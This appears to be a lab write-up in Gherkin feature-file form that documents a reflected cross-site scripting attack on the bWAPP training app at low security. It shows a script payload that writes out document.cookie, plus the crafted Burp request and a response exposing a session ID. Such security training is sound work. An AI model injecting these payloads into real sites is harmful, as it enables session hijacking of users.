# language: en

Feature: Cross-Site Scripting Reflected
  From system bWAPP
  From the A3 - Cross-Site Scripting
  With Low security level
  Background:
    Given I am running Debian Stretch GNU/Linux kernel 4.9.0-6-amd64
    And I am running Burp Suite Community edition v1.7.30
    Given the following in the url
      """
      URL: http://localhost/bWAPP/htmli_get.php
      Message: HTML Injection - Reflected (GET)
      Details:
      - Firstname and Lastname input text
      - Submit button
      Objective: Perform an XSS
      """

  Scenario: XSS Reflected
    Given the site url
    Then I try how it works
      """
      # Burp Request htmli_post.php
      GET /bWAPP/htmli_get.php?firstname=Test&lastname=Testing&form=submit
        HTTP/1.1
      Host: 192.168.75.128

      # Burp Response
      Test Testing
      """
    Then I try to inject a basic XSS string
      """
      # Injection string
      <script>document.write(document.cookie)</script>
      """
    And I craft another Burp Request to tamper it with XSS
      """
      # Burp Request htmli_post.php
      GET /bWAPP/htmli_get.php?firstname=%3Cscript%3Edocument.write%28
      document.cookie%29%3C%2Fscript%3E&lastname=-&form=submit HTTP/1.1
      Host: 192.168.75.128

      # Burp Response
      Welcome security_level=0; PHPSESSID=b27025a9677df4a4d27a4ba8c593baad;
      has_js=1 -
      """
